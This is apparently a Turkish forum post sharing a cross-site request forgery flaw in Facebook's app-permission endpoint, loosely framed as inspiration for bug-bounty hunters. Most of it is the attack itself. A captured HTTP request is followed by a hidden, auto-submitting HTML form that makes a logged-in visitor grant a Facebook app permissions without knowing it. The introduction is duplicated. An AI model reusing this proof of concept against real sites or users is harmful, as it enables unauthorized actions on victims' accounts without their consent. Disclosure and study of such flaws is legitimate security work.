arkadaşlar facebook'ta bulunan CSRF yi paylaşayım sizlerle
hoş sanalda dolu böyle ama bir yerden başlamak lazım diyerekten ilham kaynağı olur açısından paylaşayım dedim. CSRF ve XSS ciler burdan yürürsünüz umarım sizlerde böyle açıklar bulup ödül alanlar gibi ödül alırsınız.
hoş sanalda dolu böyle ama bir yerden başlamak lazım diyerekten ilham kaynağı olur açısından paylaşayım dedim. CSRF ve XSS ciler burdan yürürsünüz umarım sizlerde böyle açıklar bulup ödül alanlar gibi ödül alırsınız.
Kod:
POST /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800
fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40
Kod:
<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action="https://www.facebook.com/connect/uiserver.php" method="POST">
<input type="hidden" name="perms" value="" />
<input type="hidden" name="dubstep" value=1 />
<input type="hidden" name="new_user_session" value=1 />
<input type="hidden" name="grant_clicked" value=1 />
<input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" />
<input type="hidden" name="app_id" value="2389801228" />
<input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" />
<input type="hidden" name="app_center" value=1 />
<input type="hidden" name="is_paid_app" value="" />
<input type="hidden" name="app_center_ref" value="appcenter" />
<input type="hidden" name="response_type" value="none" />
<input type="hidden" name="from_post" value=1 />
<input type="hidden" name="__uiserv_method" value="permissions.request" />
<input type="hidden" name="grant_clicked" value="Play+Game" />
</form>
</body>
</html>
